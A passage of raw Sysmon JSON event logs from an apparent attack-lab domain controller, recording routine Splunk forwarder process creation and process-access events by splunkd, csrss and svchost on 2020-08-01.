Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nProcessGuid: {41C8662E-21A4-5F25-0000-0010229F0900}\r\nProcessId: 2232\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","ProcessGuid":"{41C8662E-21A4-5F25-0000-0010229F0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21A4-5F25-0000-0010229F0900}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21A4-5F25-0000-0010229F0900}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A4-5F25-0000-0010229F0900}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A4-5F25-0000-0010229F0900}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 